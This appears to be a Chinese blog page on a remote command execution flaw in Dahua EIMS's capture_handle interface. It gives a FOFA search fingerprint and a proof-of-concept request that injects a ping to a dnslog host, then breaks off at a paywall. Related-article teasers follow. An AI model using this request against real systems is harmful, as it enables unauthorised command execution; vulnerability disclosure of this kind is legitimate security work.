大华EIMS-capture_handle接口远程命令执行漏洞

最新推荐文章于 2025-05-14 14:24:21 发布
最新推荐文章于 2025-05-14 14:24:21 发布
阅读量734 收藏 5
点赞数 10
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36334672/article/details/136649828
版权
本文介绍了大华EIMS系统中CAPTURE_HANDLE接口存在的远程命令执行漏洞,详细阐述了漏洞影响范围、POC检测方法以及修复建议,提醒用户及时更新系统至最新版本以确保安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞介绍

​ 大华EIMS CAPTURE_HANDLE接口允许远程命令执行

2.漏洞编号
CVE CNVD CNNVD
- - -

3.影响范围
名称 版本号
-

4.检索特征

FOFA:“eims
在这里插入图片描述

5.POC
GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20xxx.dnslog.cn%20index.pcap HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection
最低0.47元/天 解锁文章
大华 EIMS-capture_handle.action接口存在远程命令执行漏洞
weixin_43567873的博客
03-11 617
大华 EIMS-capture_handle.action接口存在远程命令执行漏洞
漏洞复现】大华智慧园区综合管理平台ipms命令执行漏洞
晚风不及你
03-16 745
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华DSS城市安防监控平台Struct2-045命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-11 486
大华DSS城市安防监控平台Struct2-045命令执行漏洞(含批量验证poc)
大华智能物联综合管理平台 fastjson远程代码执行漏洞复现
0xSec
05-11 2904
​由于大华智能物联综合管理平台使用了存在漏洞的FastJson组件,未经身份验证的攻击者可利用/evo-runs/v1.0/auths/sysusers/random接口发送恶意的序列化数据执行任意指令,造成代码执行。
漏洞复现】大华智慧园区综合管理平台devicePoint文件上传漏洞
晚风不及你
02-22 895
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
漏洞复现】大华智慧园区综合管理平台deleteFtp接口远程命令执行
失心少年
12-01 802
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!大华智慧园区综合管理平台deleteFtp接口存在远程命令执行,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。1.利用如下POC进行Dnslog外带测试。
漏洞复现|大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞合集
weixin_44217321的博客
02-27 3878
大华智慧园区综合管理平台客户端由于前台缺少访问控制授权措施,可以从ip/WPMS进行定位,借助Payload进行漏洞触发,从而达到获取服务器数据的影响。大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
漏洞复现】大华智慧园区综合管理平台任意密码读取
2201_75756681的博客
01-05 829
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
网络安全-RCE(远程命令执行漏洞原理、攻击与防御
热门推荐
关注网络安全、云原生安全
10-05 1万+
目录 简介 原理 攻击 防御 参考 简介 RCE(remote command/code execute,远程命令执行)漏洞,一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想
漏洞复现-大华dahua系列,网络安全组件化入门
sfdsfgdgd的博客
04-09 871
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
EIMS企业信息管理系统 5.6.3.zip
05-25
EIMS系统数据存储格式统一,方便管理维护。数据输出格式统一为:列表,编辑,分类,属性。试用版本只开放部分功能,商业使用请购买正式版授权。 EIMS企业信息管理系统 5.6.3 版本更新说明: 1、修改了lhgdialog插件弹窗口为固定显示2、优化了获取字段属性函数3、修改了模板显示字段控制---字段名的命名规则为:{字段_n}---字段值的命名规则为:{字段_v}---取消了以表格固定的模式,避免嵌套表格出错
大华DVR2104升级包
12-24
大华DVR2104升级包
命令执行漏洞远程命令执行和系统命令执行
bwxzdjn的博客
03-27 6491
用实验案例的方式讲解远程命令执行和系统命令执行两大漏洞利用方法。通过实践更深入地了解命令执行漏洞的成因和危害,更好地掌握web安全相关方面的知识。
紧急:EIMS安全补丁,大家快补
kacoro的专栏
02-16 430
找到include/common.inc.php文件 找到 foreach($_REQUEST as $_k=>$_v) { if( strlen($_k)>0 && eregi('^(cfg_|GLOBALS)',$_k) ) {   exit('Request var not allow!'); } } 替换为下面的代码: function CheckRequest(&
大华智能物联综合管理平台 任意文件读取漏洞复现(QVD-2023-45063)
0xSec
02-01 1262
大华ICC智能物联综合管理平台readpic接口处存在任意文件读取漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。
SQL注入(二)
qq_48947141的博客
09-23 844
一、按数据库类型 1、Oracle注入 1.1.Oracle基础知识 Oracle是目前最流行的C/S或B/S体系结构的数据库之一。 数据字典:数据字典是元数据的集合,从逻辑上和物理上描述了数据库及其内容,存储于SYSTEM与SYSAUX表空间内的若干段中。 数据字典视图:数据字典中的数据比较复杂,一般查询的是数据字典视图。 数据字典视图三种不同权限的分类:分别以user,all,dba的前缀开头。 常用的数据字典视图 表名 列名 user_tables:存储用户拥有表的信息
sqlmap测试靶机
weixin_44940180的博客
08-09 519
测试SQL注入 Sqlmap.py -u "http://192.168.3.83/eims_cms_3.5/News.asp?SortID=1&ItemID=49" 可以从下面的测试结果看出此处存在SQL注入以及攻击类型和payload 获取数据库信息GET型 1. 获取数据库名字 sqlmap.py -u "http://192.168.3.3/DVWA/vulnerabilities/sqli/?i=1&Submit=Submit#" --cookie="securit
dedecms织梦暴最新严重0day漏洞
收集盒 Book box
08-12 1334
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。 今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞, 近期官方会发布相关补丁,望大家及时关注补丁动态。” 入侵EXP如下: http://www.tm
Web安全核心内容与常见漏洞总结
最新发布
weixin_47389477的博客
05-14 311
启用 ‌Content Security Policy(CSP)‌ 限制脚本加载源,阻断 XSS 攻击链。使用参数化查询(Prepared Statements)防御 SQL 注入。对用户输入进行严格校验(如正则表达式匹配),过滤特殊字符(如。输出数据时进行 HTML 实体编码,避免 XSS 攻击。实现细粒度权限管理(如 RBAC 模型),避免越权操作。部署 ‌Web 应用防火墙(WAF)‌ 过滤恶意流量。使用 SSL/TLS 加密数据传输,防止中间人攻击6。强制使用多因素认证(MFA)提升账户安全性。
EKI-1242EIMS-V1.01.01固件更新包发布
资源摘要信息:"FW_EKI-1242EIMS-V1.01.01.zip是一个固件更新包,其文件格式为ZIP,通常用于更新特定型号的工业以太网交换机,即EKI-1242的固件版本至V1.01.01。ZIP文件格式是一种压缩文件格式,用于将多个文件打包并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值